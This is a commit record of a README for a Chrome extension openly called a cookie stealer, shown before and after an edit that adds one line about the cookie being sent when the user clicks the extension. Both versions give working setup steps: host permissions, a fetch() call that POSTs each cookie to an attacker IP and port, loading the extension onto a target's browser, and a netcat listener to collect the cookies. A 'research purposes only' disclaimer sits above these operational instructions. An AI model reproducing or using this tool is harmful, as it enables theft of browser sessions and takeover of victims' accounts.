README.md, before:

# Cookie_Stealer_Chrome_Extension
This is a chrome extention that will send all cookies it sees while the user browses the web to a specified IP Address and Port!

# WARNING: This is for research purposes only! I am not resposible for any damage caused to any computer or computer system using this software!  
# How The Heck To Use It:
Download:  
```git clone https://github.com/SteamPunk424/Cookie_Stealer_Chrome_Extension```  
Open manifest.json with nano and change the host permissions to allow the extention to send to the attacker computer:  
```
{
  "manifest_version": 3,
  "name": "Cookie Sender",
  "version": "1.0",
  "action": {
    "default_popup": "popup.html"
  },
  "permissions": [
    "cookies",
    "tabs"
  ],
  "host_permissions": [
    "<all_urls>",
    "http://127.0.0.1/*",
    "http://10.10.15.17:8080/*" <---- Attacker IP and Port
  ]
}

```
Also change popup.js to send the cookie to your ip and port of your choosing:    
```
function sendCookieToProxy(cookie) {
  fetch('http://10.10.15.17:8080/cookie', { <--- Attacker IP and Port
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify(cookie)
  }).catch(err => {
    console.error('Failed:', err);
  });
}
```


# Installation to target:  
Open Chrome or Chromium and head to "chrome://extensions/" and turn on developer mode.  
Once developer mode is enabled click "load unpacked" and set the folder to the "Cookie_Stealer_Chrome_Extension" folder.  
This will install the chrome extention to the target.  

Catch the cookie requests by using netcat from the attacker computer:  
```nc -lvnp $PORT```

As the target browses to websites you will catch all of there cookies with netcat from the various places they visit.

Commit message:

Update README with cookie handling instructions
Added information about cookie handling upon extension interaction.

README.md, after:

# Cookie_Stealer_Chrome_Extension
This is a chrome extention that will send all cookies it sees while the user browses the web to a specified IP Address and Port!

# WARNING: This is for research purposes only! I am not resposible for any damage caused to any computer or computer system using this software!  
# How The Heck To Use It:
Download:  
```git clone https://github.com/SteamPunk424/Cookie_Stealer_Chrome_Extension```  
Open manifest.json with nano and change the host permissions to allow the extention to send to the attacker computer:  
```
{
  "manifest_version": 3,
  "name": "Cookie Sender",
  "version": "1.0",
  "action": {
    "default_popup": "popup.html"
  },
  "permissions": [
    "cookies",
    "tabs"
  ],
  "host_permissions": [
    "<all_urls>",
    "http://127.0.0.1/*",
    "http://10.10.15.17:8080/*" <---- Attacker IP and Port
  ]
}

```
Also change popup.js to send the cookie to your ip and port of your choosing:    
```
function sendCookieToProxy(cookie) {
  fetch('http://10.10.15.17:8080/cookie', { <--- Attacker IP and Port
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify(cookie)
  }).catch(err => {
    console.error('Failed:', err);
  });
}
```


# Installation to target:  
Open Chrome or Chromium and head to "chrome://extensions/" and turn on developer mode.  
Once developer mode is enabled click "load unpacked" and set the folder to the "Cookie_Stealer_Chrome_Extension" folder.  
This will install the chrome extention to the target.  
When the user clicks on the extention, it will be treated as user interaction and the cookie will be sent to the attacker machine.

Catch the cookie requests by using netcat from the attacker computer:  
```nc -lvnp $PORT```

As the target browses to websites you will catch all of there cookies with netcat from the various places they visit.
